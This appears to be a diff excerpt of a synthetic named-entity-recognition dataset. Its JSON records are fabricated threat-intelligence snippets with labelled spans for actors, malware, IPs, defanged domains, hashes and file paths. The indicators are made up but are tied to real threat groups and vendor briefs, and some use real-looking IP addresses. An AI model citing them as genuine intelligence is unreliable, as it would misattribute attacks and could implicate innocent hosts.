+ {"text": "Incident Report: Sandworm compromised the network via initial access from 151.119.64.224. The threat actor deployed ADFind and exfiltrated data to collect-log[.]tech. Lateral movement was observed to 216.114.207.221. A dropper with MD5 hash 634eca2d6fb400a19c70368de760e221 was found at C:\\ProgramData\\Microsoft\\update.bat. The exfiltration endpoint data-backup[.]site was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: Sandworm": [[17, 25]], "IP_ADDRESS: 151.119.64.224": [[74, 88]], "TOOL: ADFind": [[116, 122]], "DOMAIN: collect-log[.]tech": [[147, 165]], "IP_ADDRESS: 216.114.207.221": [[200, 215]], "HASH: 634eca2d6fb400a19c70368de760e221": [[241, 273]], "FILEPATH: C:\\ProgramData\\Microsoft\\update.bat": [[287, 322]], "DOMAIN: data-backup[.]site": [[350, 368]]}, "info": {"id": "synth_00032", "source": "synthetic_ioc"}}
33
+ {"text": "A phishing email was received from verify@identity-check.tech with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://update-service[.]net/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded TrickBot (SHA256: 9657dc1942bcbba61923b7a2d4c628cb853d4de4f4e845cb78dc42516fe73a90) which was saved to C:\\Windows\\Tasks\\scheduled_task.xml.", "spans": {"EMAIL: verify@identity-check.tech": [[35, 61]], "URL: hxxps://update-service[.]net/login/verify": [[155, 196]], "MALWARE: TrickBot": [[292, 300]], "HASH: 9657dc1942bcbba61923b7a2d4c628cb853d4de4f4e845cb78dc42516fe73a90": [[310, 374]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[395, 430]]}, "info": {"id": "synth_00033", "source": "synthetic_ioc"}}
34
+ {"text": "IOC Summary for Royal Ransomware campaign:\n- 85.105.125.124\n- 109.222.103.232\n- 203.43.98.1\n- sync-cloud[.]work\n- cert-verify[.]dev\n- SHA256: 55356f5d1d275c82c5f50989c863cfe63fa7aec9064c9604538acd2dda6888dd\n- MD5: c3d8aee4b0f4a8b25b004f58a40a02fe", "spans": {"MALWARE: Royal Ransomware": [[16, 32]], "IP_ADDRESS: 85.105.125.124": [[45, 59]], "IP_ADDRESS: 109.222.103.232": [[62, 77]], "IP_ADDRESS: 203.43.98.1": [[80, 91]], "DOMAIN: sync-cloud[.]work": [[94, 111]], "DOMAIN: cert-verify[.]dev": [[114, 131]], "HASH: 55356f5d1d275c82c5f50989c863cfe63fa7aec9064c9604538acd2dda6888dd": [[142, 206]], "HASH: c3d8aee4b0f4a8b25b004f58a40a02fe": [[214, 246]]}, "info": {"id": "synth_00034", "source": "synthetic_ioc"}}
35
+ {"text": "Exploitation of CVE-2024-3400 was attributed to MuddyWater targeting Azure AD instances. The exploit payload was served from 195.179.246.188 and communicated with collect-log[.]tech for command-and-control. Post-exploitation, a webshell (SHA256: d3089c9af03bd92285285f2c742374b1d0304ac02c0fdca854d20571794e70c5) was deployed to C:\\Users\\Public\\desktop.ini.", "spans": {"CVE_ID: CVE-2024-3400": [[16, 29]], "THREAT_ACTOR: MuddyWater": [[48, 58]], "SYSTEM: Azure AD": [[69, 77]], "IP_ADDRESS: 195.179.246.188": [[125, 140]], "DOMAIN: collect-log[.]tech": [[163, 181]], "HASH: d3089c9af03bd92285285f2c742374b1d0304ac02c0fdca854d20571794e70c5": [[246, 310]], "FILEPATH: C:\\Users\\Public\\desktop.ini": [[328, 355]]}, "info": {"id": "synth_00035", "source": "synthetic_ioc"}}
36
+ {"text": "Forensic examination of the compromised host identified FormBook artifacts. The primary payload was located at C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe with SHA256 hash 4ef681cd5d368dc4607033aaa141bfd5dec0702749ba54161fb5c7c09c66910f. A secondary implant was found at /opt/.cache/reverse_shell (MD5: fbf15131b42aa11d86af50885145a269). Network logs showed outbound connections to 109.248.15.149 and DNS queries to shell-cmd[.]online.", "spans": {"MALWARE: FormBook": [[56, 64]], "FILEPATH: C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe": [[111, 155]], "HASH: 4ef681cd5d368dc4607033aaa141bfd5dec0702749ba54161fb5c7c09c66910f": [[173, 237]], "FILEPATH: /opt/.cache/reverse_shell": [[272, 297]], "HASH: fbf15131b42aa11d86af50885145a269": [[304, 336]], "IP_ADDRESS: 109.248.15.149": [[383, 397]], "DOMAIN: shell-cmd[.]online": [[417, 435]]}, "info": {"id": "synth_00036", "source": "synthetic_ioc"}}
37
+ {"text": "Threat Intelligence Brief (SentinelOne): APT28 has been observed deploying Bumblebee in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from phishing@secure-update.net. Infrastructure includes 203.13.150.123, 208.236.219.136, and dns-resolve[.]cc. SHA1 indicator: b1acc2a42a5160b4353f6b1fdf5c21cd16612bd2.", "spans": {"ORGANIZATION: SentinelOne": [[27, 38]], "THREAT_ACTOR: APT28": [[41, 46]], "MALWARE: Bumblebee": [[75, 84]], "EMAIL: phishing@secure-update.net": [[197, 223]], "IP_ADDRESS: 203.13.150.123": [[249, 263]], "IP_ADDRESS: 208.236.219.136": [[265, 280]], "DOMAIN: dns-resolve[.]cc": [[286, 302]], "HASH: b1acc2a42a5160b4353f6b1fdf5c21cd16612bd2": [[320, 360]]}, "info": {"id": "synth_00037", "source": "synthetic_ioc"}}
38
+ {"text": "ALERT: Remcos RAT detected on VMware ESXi endpoint. Process C:\\Users\\Public\\Documents\\payload.dll (MD5: d2f782d5129e169f26f02799b5437553) initiated outbound connection to 23.218.48.18 resolving exchange-key[.]link. Immediate containment recommended.", "spans": {"MALWARE: Remcos RAT": [[7, 17]], "SYSTEM: VMware ESXi": [[30, 41]], "FILEPATH: C:\\Users\\Public\\Documents\\payload.dll": [[60, 97]], "HASH: d2f782d5129e169f26f02799b5437553": [[104, 136]], "IP_ADDRESS: 23.218.48.18": [[171, 183]], "DOMAIN: exchange-key[.]link": [[194, 213]]}, "info": {"id": "synth_00038", "source": "synthetic_ioc"}}
39
+ {"text": "The Raccoon Stealer loader contacts three staging URLs: hxxps://smtp-relay[.]icu/download/payload.exe, hxxp://system-patch[.]online/gate.php, and hxxps://verify-cert[.]dev/api/beacon. The final payload (SHA256: 9144f94601f5dab20b11b44af0735877d3c85185e705f78ddda1a1475faeb869) is downloaded and executed. Fallback C2 is at 142.149.153.11.", "spans": {"MALWARE: Raccoon Stealer": [[4, 19]], "URL: hxxps://smtp-relay[.]icu/download/payload.exe": [[56, 101]], "URL: hxxp://system-patch[.]online/gate.php": [[103, 140]], "URL: hxxps://verify-cert[.]dev/api/beacon": [[146, 182]], "HASH: 9144f94601f5dab20b11b44af0735877d3c85185e705f78ddda1a1475faeb869": [[211, 275]], "IP_ADDRESS: 142.149.153.11": [[323, 337]]}, "info": {"id": "synth_00039", "source": "synthetic_ioc"}}
40
+ {"text": "The phishing campaign used sender addresses admin@fake-portal.org and tax@refund-claim.pw. Links in the emails pointed to c2-relay[.]top hosted at 210.81.240.67. The attached document dropped a payload to C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe with hash e495e89dbde475c0f493079b47970ed630be461c60d3d9c1b029643a91c81f85.", "spans": {"EMAIL: admin@fake-portal.org": [[44, 65]], "EMAIL: tax@refund-claim.pw": [[70, 89]], "DOMAIN: c2-relay[.]top": [[122, 136]], "IP_ADDRESS: 210.81.240.67": [[147, 160]], "FILEPATH: C:\\Users\\admin\\AppData\\Local\\Temp\\loader.exe": [[205, 249]], "HASH: e495e89dbde475c0f493079b47970ed630be461c60d3d9c1b029643a91c81f85": [[260, 324]]}, "info": {"id": "synth_00040", "source": "synthetic_ioc"}}
41
+ {"text": "Multiple Vidar samples identified:\n- SHA256: 8eae837415e160b3264c05847d823ba2d1fb5fb34bcab50289355e0d83d8906d\n- SHA256: bec132e1835c8526ab7508efdba6cba107c9c93d880f8c6b8a80baab21a04e45\n- MD5: 14eaa44a33af535cf1a961a2b0a27f4e\n- MD5: 1a4fbd4f9ace3e2828da55e2c129d9ea\nAll samples beacon to 162.62.68.102 and auth-portal[.]info.", "spans": {"MALWARE: Vidar": [[9, 14]], "HASH: 8eae837415e160b3264c05847d823ba2d1fb5fb34bcab50289355e0d83d8906d": [[45, 109]], "HASH: bec132e1835c8526ab7508efdba6cba107c9c93d880f8c6b8a80baab21a04e45": [[120, 184]], "HASH: 14eaa44a33af535cf1a961a2b0a27f4e": [[192, 224]], "HASH: 1a4fbd4f9ace3e2828da55e2c129d9ea": [[232, 264]], "IP_ADDRESS: 162.62.68.102": [[287, 300]], "DOMAIN: auth-portal[.]info": [[305, 323]]}, "info": {"id": "synth_00041", "source": "synthetic_ioc"}}
42
+ {"text": "Lazarus Group used Net-GPPPassword for credential dumping and ADFind for lateral movement. Credentials were exfiltrated to 158.118.81.238. The attacker pivoted to 216.3.118.160 and dropped C:\\Recovery\\WindowsRE\\agent.exe (MD5: 1d62870c66779c42edf8de1f8d3734f6). C2 traffic was routed through data-backup[.]site.", "spans": {"THREAT_ACTOR: Lazarus Group": [[0, 13]], "TOOL: Net-GPPPassword": [[19, 34]], "TOOL: ADFind": [[62, 68]], "IP_ADDRESS: 158.118.81.238": [[123, 137]], "IP_ADDRESS: 216.3.118.160": [[163, 176]], "FILEPATH: C:\\Recovery\\WindowsRE\\agent.exe": [[189, 220]], "HASH: 1d62870c66779c42edf8de1f8d3734f6": [[227, 259]], "DOMAIN: data-backup[.]site": [[292, 310]]}, "info": {"id": "synth_00042", "source": "synthetic_ioc"}}
43
+ {"text": "The LockBit attack began with exploitation of CVE-2022-26134. The ransomware binary (SHA256: 87d80a63fa49abfcf014eea1c6c143d3e99cf5afbad735fd20821bfcc565e990) was deployed to C:\\Users\\Public\\Documents\\payload.dll. Ransom negotiation portal was hosted at login-verify[.]top (208.68.34.239). Contact email for payment: security@alert-notification.icu.", "spans": {"MALWARE: LockBit": [[4, 11]], "CVE_ID: CVE-2022-26134": [[46, 60]], "HASH: 87d80a63fa49abfcf014eea1c6c143d3e99cf5afbad735fd20821bfcc565e990": [[93, 157]], "FILEPATH: C:\\Users\\Public\\Documents\\payload.dll": [[175, 212]], "DOMAIN: login-verify[.]top": [[254, 272]], "IP_ADDRESS: 208.68.34.239": [[274, 287]], "EMAIL: security@alert-notification.icu": [[317, 348]]}, "info": {"id": "synth_00043", "source": "synthetic_ioc"}}
44
+ {"text": "DNS analysis for FormBook infrastructure: key-exchange[.]link resolved to 217.181.78.157, dns-resolve[.]cc resolved to 211.3.171.210, and portal-auth[.]info was used as a DNS-over-HTTPS tunnel. The implant hash is 49a0d48b401f01849f8575f553af5279.", "spans": {"MALWARE: FormBook": [[17, 25]], "DOMAIN: key-exchange[.]link": [[42, 61]], "IP_ADDRESS: 217.181.78.157": [[74, 88]], "DOMAIN: dns-resolve[.]cc": [[90, 106]], "IP_ADDRESS: 211.3.171.210": [[119, 132]], "DOMAIN: portal-auth[.]info": [[138, 156]], "HASH: 49a0d48b401f01849f8575f553af5279": [[214, 246]]}, "info": {"id": "synth_00044", "source": "synthetic_ioc"}}
45
+ {"text": "Sandbox Report: REvil\nSHA256: a393d5c5acdd16e728996801f5bbb5b834c96a852cc35f4fc051db53168b0aac\nMD5: 7aa07a214ce145f5a104aa9ffe1f8577\nFile created: C:\\ProgramData\\Microsoft\\update.bat\nFile modified: C:\\ProgramData\\Microsoft\\update.bat\nNetwork connection: 46.241.225.35\nDNS query: cert-verify[.]dev\nHTTP request: hxxps://shell-cmd[.]online/stage2", "spans": {"MALWARE: REvil": [[16, 21]], "HASH: a393d5c5acdd16e728996801f5bbb5b834c96a852cc35f4fc051db53168b0aac": [[30, 94]], "HASH: 7aa07a214ce145f5a104aa9ffe1f8577": [[100, 132]], "FILEPATH: C:\\ProgramData\\Microsoft\\update.bat": [[147, 182], [198, 233]], "IP_ADDRESS: 46.241.225.35": [[254, 267]], "DOMAIN: cert-verify[.]dev": [[279, 296]], "URL: hxxps://shell-cmd[.]online/stage2": [[311, 344]]}, "info": {"id": "synth_00045", "source": "synthetic_ioc"}}
46
+ {"text": "Analysis of FormBook sample (SHA256: 4e0863e4cc68d9634d0af31a52e2d7933912795b397385adb96d06e507ded32e) revealed command-and-control communication with 82.70.73.155 over port 9090. A secondary C2 channel was observed connecting to exfil-data[.]club which resolved to 104.184.88.53. The malware binary was written to C:\\ProgramData\\svchost.exe and established persistence via a scheduled task.", "spans": {"MALWARE: FormBook": [[12, 20]], "HASH: 4e0863e4cc68d9634d0af31a52e2d7933912795b397385adb96d06e507ded32e": [[37, 101]], "IP_ADDRESS: 82.70.73.155": [[151, 163]], "DOMAIN: exfil-data[.]club": [[230, 247]], "IP_ADDRESS: 104.184.88.53": [[266, 279]], "FILEPATH: C:\\ProgramData\\svchost.exe": [[315, 341]]}, "info": {"id": "synth_00046", "source": "synthetic_ioc"}}
47
+ {"text": "Incident Report: TA551 compromised the network via initial access from 144.232.233.217. The threat actor deployed CrackMapExec and exfiltrated data to token-auth[.]space. Lateral movement was observed to 198.24.163.109. A dropper with MD5 hash 5772834eafa955aa0426b7a2d27bb50c was found at C:\\Windows\\System32\\svchost_update.exe. The exfiltration endpoint secure-login[.]top was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: TA551": [[17, 22]], "IP_ADDRESS: 144.232.233.217": [[71, 86]], "TOOL: CrackMapExec": [[114, 126]], "DOMAIN: token-auth[.]space": [[151, 169]], "IP_ADDRESS: 198.24.163.109": [[204, 218]], "HASH: 5772834eafa955aa0426b7a2d27bb50c": [[244, 276]], "FILEPATH: C:\\Windows\\System32\\svchost_update.exe": [[290, 328]], "DOMAIN: secure-login[.]top": [[356, 374]]}, "info": {"id": "synth_00047", "source": "synthetic_ioc"}}
48
+ {"text": "A phishing email was received from noreply@payment-confirm.top with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://malware-drop[.]net/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded Conti (SHA256: b0f27c4938d194c85a6db3b58b8679544b7591b053705be3ed765c07a8602d21) which was saved to C:\\Temp\\mimikatz.exe.", "spans": {"EMAIL: noreply@payment-confirm.top": [[35, 62]], "URL: hxxps://malware-drop[.]net/login/verify": [[156, 195]], "MALWARE: Conti": [[291, 296]], "HASH: b0f27c4938d194c85a6db3b58b8679544b7591b053705be3ed765c07a8602d21": [[306, 370]], "FILEPATH: C:\\Temp\\mimikatz.exe": [[391, 411]]}, "info": {"id": "synth_00048", "source": "synthetic_ioc"}}
49
+ {"text": "IOC Summary for FormBook campaign:\n- 199.142.181.110\n- 91.29.20.242\n- 82.140.10.214\n- api-gateway[.]club\n- auth-token[.]space\n- SHA256: 57da9e9aaae0dee0c486eb9dad7f6bd56f25cda5f979d9e1172124cbc410fd43\n- MD5: ca8cf94cf0886490d3120e903edb090d", "spans": {"MALWARE: FormBook": [[16, 24]], "IP_ADDRESS: 199.142.181.110": [[37, 52]], "IP_ADDRESS: 91.29.20.242": [[55, 67]], "IP_ADDRESS: 82.140.10.214": [[70, 83]], "DOMAIN: api-gateway[.]club": [[86, 104]], "DOMAIN: auth-token[.]space": [[107, 125]], "HASH: 57da9e9aaae0dee0c486eb9dad7f6bd56f25cda5f979d9e1172124cbc410fd43": [[136, 200]], "HASH: ca8cf94cf0886490d3120e903edb090d": [[208, 240]]}, "info": {"id": "synth_00049", "source": "synthetic_ioc"}}
50
+ {"text": "Exploitation of CVE-2023-34362 was attributed to Winnti Group targeting Confluence Server instances. The exploit payload was served from 77.11.79.94 and communicated with secure-login[.]top for command-and-control. Post-exploitation, a webshell (SHA256: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf) was deployed to C:\\Windows\\Temp\\nc.exe.", "spans": {"CVE_ID: CVE-2023-34362": [[16, 30]], "THREAT_ACTOR: Winnti Group": [[49, 61]], "SYSTEM: Confluence Server": [[72, 89]], "IP_ADDRESS: 77.11.79.94": [[137, 148]], "DOMAIN: secure-login[.]top": [[171, 189]], "HASH: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf": [[254, 318]], "FILEPATH: C:\\Windows\\Temp\\nc.exe": [[336, 358]]}, "info": {"id": "synth_00050", "source": "synthetic_ioc"}}
51
+ {"text": "Forensic examination of the compromised host identified Raccoon Stealer artifacts. The primary payload was located at C:\\Windows\\Tasks\\scheduled_task.xml with SHA256 hash de206fdbe504837efce64b823f08a377a76f978bbf772783cacac5ac5fb42712. A secondary implant was found at /tmp/linpeas.sh (MD5: ef245857ae1413dc3df0be611fe879ef). Network logs showed outbound connections to 46.91.200.144 and DNS queries to backup-data[.]site.", "spans": {"MALWARE: Raccoon Stealer": [[56, 71]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[118, 153]], "HASH: de206fdbe504837efce64b823f08a377a76f978bbf772783cacac5ac5fb42712": [[171, 235]], "FILEPATH: /tmp/linpeas.sh": [[270, 285]], "HASH: ef245857ae1413dc3df0be611fe879ef": [[292, 324]], "IP_ADDRESS: 46.91.200.144": [[371, 384]], "DOMAIN: backup-data[.]site": [[404, 422]]}, "info": {"id": "synth_00051", "source": "synthetic_ioc"}}
52
+ {"text": "Threat Intelligence Brief (Check Point): FIN11 has been observed deploying Royal Ransomware in a new campaign targeting financial institutions. Initial access is gained through spear-phishing emails from finance@wire-transfer.info. Infrastructure includes 141.222.42.250, 88.226.106.7, and vpn-tunnel[.]pw. SHA1 indicator: 2b0c3cac3641356e63c6bfa0a3d793ffe47a21dd.", "spans": {"ORGANIZATION: Check Point": [[27, 38]], "THREAT_ACTOR: FIN11": [[41, 46]], "MALWARE: Royal Ransomware": [[75, 91]], "EMAIL: finance@wire-transfer.info": [[204, 230]], "IP_ADDRESS: 141.222.42.250": [[256, 270]], "IP_ADDRESS: 88.226.106.7": [[272, 284]], "DOMAIN: vpn-tunnel[.]pw": [[290, 305]], "HASH: 2b0c3cac3641356e63c6bfa0a3d793ffe47a21dd": [[323, 363]]}, "info": {"id": "synth_00052", "source": "synthetic_ioc"}}
53
+ {"text": "ALERT: ShadowPad detected on Citrix ADC endpoint. Process C:\\Windows\\Tasks\\scheduled_task.xml (MD5: 5f480a2bfb43a1aa12c0cd47f0aadd1b) initiated outbound connection to 182.206.172.222 resolving shell-cmd[.]online. Immediate containment recommended.", "spans": {"MALWARE: ShadowPad": [[7, 16]], "SYSTEM: Citrix ADC": [[29, 39]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[58, 93]], "HASH: 5f480a2bfb43a1aa12c0cd47f0aadd1b": [[100, 132]], "IP_ADDRESS: 182.206.172.222": [[167, 182]], "DOMAIN: shell-cmd[.]online": [[193, 211]]}, "info": {"id": "synth_00053", "source": "synthetic_ioc"}}
54
+ {"text": "The NjRAT loader contacts three staging URLs: hxxps://dns-resolve[.]cc/download/payload.exe, hxxp://loader-bin[.]work/gate.php, and hxxps://data-backup[.]site/api/beacon. The final payload (SHA256: 032b3934962dce68afa4868f97698813c5f587600120dbc8a963fa9c585c38e0) is downloaded and executed. Fallback C2 is at 176.224.10.220.", "spans": {"MALWARE: NjRAT": [[4, 9]], "URL: hxxps://dns-resolve[.]cc/download/payload.exe": [[46, 91]], "URL: hxxp://loader-bin[.]work/gate.php": [[93, 126]], "URL: hxxps://data-backup[.]site/api/beacon": [[132, 169]], "HASH: 032b3934962dce68afa4868f97698813c5f587600120dbc8a963fa9c585c38e0": [[198, 262]], "IP_ADDRESS: 176.224.10.220": [[310, 324]]}, "info": {"id": "synth_00054", "source": "synthetic_ioc"}}
55
+ {"text": "The phishing campaign used sender addresses security@alert-notification.icu and billing@invoice-payment.work. Links in the emails pointed to share-files[.]biz hosted at 169.79.211.204. The attached document dropped a payload to C:\\Windows\\Tasks\\scheduled_task.xml with hash 80cb00a64ff9847bf91c83ba31283cac85fb4748450856d8e940a488cf0da6d7.", "spans": {"EMAIL: security@alert-notification.icu": [[44, 75]], "EMAIL: billing@invoice-payment.work": [[80, 108]], "DOMAIN: share-files[.]biz": [[141, 158]], "IP_ADDRESS: 169.79.211.204": [[169, 183]], "FILEPATH: C:\\Windows\\Tasks\\scheduled_task.xml": [[228, 263]], "HASH: 80cb00a64ff9847bf91c83ba31283cac85fb4748450856d8e940a488cf0da6d7": [[274, 338]]}, "info": {"id": "synth_00055", "source": "synthetic_ioc"}}
56
+ {"text": "Multiple Ryuk samples identified:\n- SHA256: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0\n- SHA256: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01\n- MD5: 82752ae2f5d6008330bcc2d4cab188b2\n- MD5: eefcb459329b2a8358f28e4833326f5e\nAll samples beacon to 185.169.50.103 and fast-cdn[.]xyz.", "spans": {"MALWARE: Ryuk": [[9, 13]], "HASH: 75d25a29646de86ae604bf927fefdba5af3d3d04b806bf8be3ab4f0fd9bfb0d0": [[44, 108]], "HASH: eaed36f53105a93364c678de8fd8560673f4cb5c300594540bfc0c7c7e29bd01": [[119, 183]], "HASH: 82752ae2f5d6008330bcc2d4cab188b2": [[191, 223]], "HASH: eefcb459329b2a8358f28e4833326f5e": [[231, 263]], "IP_ADDRESS: 185.169.50.103": [[286, 300]], "DOMAIN: fast-cdn[.]xyz": [[305, 319]]}, "info": {"id": "synth_00056", "source": "synthetic_ioc"}}
57
+ {"text": "APT29 used Rubeus for credential dumping and BloodHound for lateral movement. Credentials were exfiltrated to 151.90.165.131. The attacker pivoted to 181.174.252.216 and dropped C:\\Windows\\Temp\\procdump64.exe (MD5: a3889edbfc83694edfd257f9b0b7d090). C2 traffic was routed through fast-cdn[.]xyz.", "spans": {"THREAT_ACTOR: APT29": [[0, 5]], "TOOL: Rubeus": [[11, 17]], "TOOL: BloodHound": [[45, 55]], "IP_ADDRESS: 151.90.165.131": [[110, 124]], "IP_ADDRESS: 181.174.252.216": [[150, 165]], "FILEPATH: C:\\Windows\\Temp\\procdump64.exe": [[178, 208]], "HASH: a3889edbfc83694edfd257f9b0b7d090": [[215, 247]], "DOMAIN: fast-cdn[.]xyz": [[280, 294]]}, "info": {"id": "synth_00057", "source": "synthetic_ioc"}}
58
+ {"text": "The Conti attack began with exploitation of CVE-2024-21762. The ransomware binary (SHA256: b33f572efb25280ecab4e039f6c5531768492d9e41d26ee693cb37c6fd8953f5) was deployed to C:\\Windows\\Temp\\debug.exe. Ransom negotiation portal was hosted at cert-verify[.]dev (146.46.149.247). Contact email for payment: support@account-verify.xyz.", "spans": {"MALWARE: Conti": [[4, 9]], "CVE_ID: CVE-2024-21762": [[44, 58]], "HASH: b33f572efb25280ecab4e039f6c5531768492d9e41d26ee693cb37c6fd8953f5": [[91, 155]], "FILEPATH: C:\\Windows\\Temp\\debug.exe": [[173, 198]], "DOMAIN: cert-verify[.]dev": [[240, 257]], "IP_ADDRESS: 146.46.149.247": [[259, 273]], "EMAIL: support@account-verify.xyz": [[303, 329]]}, "info": {"id": "synth_00058", "source": "synthetic_ioc"}}
59
+ {"text": "DNS analysis for RedLine Stealer infrastructure: patch-system[.]online resolved to 162.112.156.252, login-verify[.]top resolved to 209.30.99.231, and exploit-hub[.]site was used as a DNS-over-HTTPS tunnel. The implant hash is 85be308616be93dd4a0ffa0a698a6e63.", "spans": {"MALWARE: RedLine Stealer": [[17, 32]], "DOMAIN: patch-system[.]online": [[49, 70]], "IP_ADDRESS: 162.112.156.252": [[83, 98]], "DOMAIN: login-verify[.]top": [[100, 118]], "IP_ADDRESS: 209.30.99.231": [[131, 144]], "DOMAIN: exploit-hub[.]site": [[150, 168]], "HASH: 85be308616be93dd4a0ffa0a698a6e63": [[226, 258]]}, "info": {"id": "synth_00059", "source": "synthetic_ioc"}}
60
+ {"text": "Sandbox Report: BazarLoader\nSHA256: 817efad8e291fe740b480d39012992d92433be9d6fa51e6617e0c8bbd8a30c23\nMD5: e4528c53ff82248ebf5adbdaaecba60d\nFile created: C:\\Users\\Public\\Libraries\\shell.ps1\nFile modified: C:\\Windows\\Temp\\procdump64.exe\nNetwork connection: 144.12.182.112\nDNS query: update-service[.]net\nHTTP request: hxxps://exfil-data[.]club/stage2", "spans": {"MALWARE: BazarLoader": [[16, 27]], "HASH: 817efad8e291fe740b480d39012992d92433be9d6fa51e6617e0c8bbd8a30c23": [[36, 100]], "HASH: e4528c53ff82248ebf5adbdaaecba60d": [[106, 138]], "FILEPATH: C:\\Users\\Public\\Libraries\\shell.ps1": [[153, 188]], "FILEPATH: C:\\Windows\\Temp\\procdump64.exe": [[204, 234]], "IP_ADDRESS: 144.12.182.112": [[255, 269]], "DOMAIN: update-service[.]net": [[281, 301]], "URL: hxxps://exfil-data[.]club/stage2": [[316, 348]]}, "info": {"id": "synth_00060", "source": "synthetic_ioc"}}
61
+ {"text": "Analysis of Bumblebee sample (SHA256: ee84cef4e1dfb28150d31955134d51166e2471c5b90cb014523179552dd35178) revealed command-and-control communication with 95.94.111.18 over port 9090. A secondary C2 channel was observed connecting to system-patch[.]online which resolved to 167.160.81.170. The malware binary was written to C:\\Users\\Public\\desktop.ini and established persistence via a scheduled task.", "spans": {"MALWARE: Bumblebee": [[12, 21]], "HASH: ee84cef4e1dfb28150d31955134d51166e2471c5b90cb014523179552dd35178": [[38, 102]], "IP_ADDRESS: 95.94.111.18": [[152, 164]], "DOMAIN: system-patch[.]online": [[231, 252]], "IP_ADDRESS: 167.160.81.170": [[271, 285]], "FILEPATH: C:\\Users\\Public\\desktop.ini": [[321, 348]]}, "info": {"id": "synth_00061", "source": "synthetic_ioc"}}
62
+ {"text": "Incident Report: MuddyWater compromised the network via initial access from 182.84.104.179. The threat actor deployed Net-GPPPassword and exfiltrated data to backup-data[.]site. Lateral movement was observed to 156.142.33.50. A dropper with MD5 hash 7540894c91f6203fc7b302ff9610d612 was found at /opt/.cache/reverse_shell. The exfiltration endpoint c2-relay[.]top was registered 48 hours before the attack.", "spans": {"THREAT_ACTOR: MuddyWater": [[17, 27]], "IP_ADDRESS: 182.84.104.179": [[76, 90]], "TOOL: Net-GPPPassword": [[118, 133]], "DOMAIN: backup-data[.]site": [[158, 176]], "IP_ADDRESS: 156.142.33.50": [[211, 224]], "HASH: 7540894c91f6203fc7b302ff9610d612": [[250, 282]], "FILEPATH: /opt/.cache/reverse_shell": [[296, 321]], "DOMAIN: c2-relay[.]top": [[349, 363]]}, "info": {"id": "synth_00062", "source": "synthetic_ioc"}}
63
+ {"text": "A phishing email was received from hr@resume-upload.club with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://deploy-code[.]store/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded RedLine Stealer (SHA256: 4a05cde81910f698ccafc66e867c4a3c29676f7282513bd189047b915b599a85) which was saved to C:\\Users\\Public\\desktop.ini.", "spans": {"EMAIL: hr@resume-upload.club": [[35, 56]], "URL: hxxps://deploy-code[.]store/login/verify": [[150, 190]], "MALWARE: RedLine Stealer": [[286, 301]], "HASH: 4a05cde81910f698ccafc66e867c4a3c29676f7282513bd189047b915b599a85": [[311, 375]], "FILEPATH: C:\\Users\\Public\\desktop.ini": [[396, 423]]}, "info": {"id": "synth_00063", "source": "synthetic_ioc"}}
64
+ {"text": "IOC Summary for Remcos RAT campaign:\n- 181.141.214.1\n- 158.74.54.111\n- 163.120.114.114\n- exfil-data[.]club\n- web-cache[.]io\n- SHA256: 2798512e2e944163ddf0807d6314066ae81afd6cb353f45ad5fdef7aafd5553a\n- MD5: 5e27f6a50b354f1e517af5943cb1c2c0", "spans": {"MALWARE: Remcos RAT": [[16, 26]], "IP_ADDRESS: 181.141.214.1": [[39, 52]], "IP_ADDRESS: 158.74.54.111": [[55, 68]], "IP_ADDRESS: 163.120.114.114": [[71, 86]], "DOMAIN: exfil-data[.]club": [[89, 106]], "DOMAIN: web-cache[.]io": [[109, 123]], "HASH: 2798512e2e944163ddf0807d6314066ae81afd6cb353f45ad5fdef7aafd5553a": [[134, 198]], "HASH: 5e27f6a50b354f1e517af5943cb1c2c0": [[206, 238]]}, "info": {"id": "synth_00064", "source": "synthetic_ioc"}}
65
+ {"text": "Exploitation of CVE-2023-46805 was attributed to Sandworm targeting Ivanti Connect Secure instances. The exploit payload was served from 23.73.132.170 and communicated with malware-drop[.]net for command-and-control. Post-exploitation, a webshell (SHA256: c6f93c69bbf44e85d43ead55556649ea31b5f27b803afd6b09dbd792fbae2bd6) was deployed to C:\\Temp\\mimikatz.exe.", "spans": {"CVE_ID: CVE-2023-46805": [[16, 30]], "THREAT_ACTOR: Sandworm": [[49, 57]], "SYSTEM: Ivanti Connect Secure": [[68, 89]], "IP_ADDRESS: 23.73.132.170": [[137, 150]], "DOMAIN: malware-drop[.]net": [[173, 191]], "HASH: c6f93c69bbf44e85d43ead55556649ea31b5f27b803afd6b09dbd792fbae2bd6": [[256, 320]], "FILEPATH: C:\\Temp\\mimikatz.exe": [[338, 358]]}, "info": {"id": "synth_00065", "source": "synthetic_ioc"}}
66
